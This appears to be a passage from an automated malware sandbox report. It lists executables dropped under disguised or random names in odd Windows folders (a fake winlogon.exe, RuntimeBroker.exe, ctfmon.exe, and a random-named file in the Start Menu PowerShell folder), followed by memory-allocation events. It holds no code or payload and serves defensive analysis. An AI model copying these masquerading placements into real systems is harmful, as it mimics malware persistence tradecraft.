Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\AccountPictures\RuntimeBroker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Mail\ctfmon.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Memory allocated: 1020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\B9exXW7c3t.exe	Memory allocated: 1AE80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SchCache\QeWHGGzCXwoQygZUiDI.exe	Memory allocated: 1AA60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Memory allocated: 1A720000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Default\Links\ApplicationFrameHost.exe	Memory allocated: 1010000 memory reserve \| memory write watch	Jump to behavior
